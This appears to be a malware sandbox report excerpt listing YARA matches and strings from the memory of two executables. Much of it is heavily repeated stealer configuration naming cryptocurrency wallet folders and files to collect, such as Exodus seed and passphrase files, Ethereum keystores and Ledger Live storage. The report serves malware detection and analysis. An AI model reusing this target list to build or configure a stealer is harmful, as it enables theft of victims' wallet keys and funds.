Source: Yara match File source: Process Memory Space: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe PID: 1016, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe PID: 1016, type: MEMORYSTR
Source: ElmEHL9kP9.exe String found in binary or memory: Wallets/Electrum-LTC
Source: ElmEHL9kP9.exe, 00000000.00000003.1672004700.00000000010EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Walh6
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ElmEHL9kP9.exe, 00000000.00000003.1672004700.00000000010EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: e","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t"V-
Source: ElmEHL9kP9.exe, 00000000.00000003.1672004700.00000000010EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: e","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t"V-
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ElmEHL9kP9.exe, 00000000.00000003.1672004700.00000000010EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ElmEHL9kP9.exe, 00000000.00000003.1672004700.00000000010EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","
Source: ElmEHL9kP9.exe String found in binary or memory: %appdata%\Ethereum
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ElmEHL9kP9.exe, 00000000.00000003.1672004700.00000000010EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: KF7H5PJ1NUO0L9UQ8ODVOZVGTTR9.exe, 00000006.00000002.2481882187.0000000000D87000.00000040.00000001.01000000.00000009.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: ElmEHL9kP9.exe, 00000000.00000003.1672004700.00000000010EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","
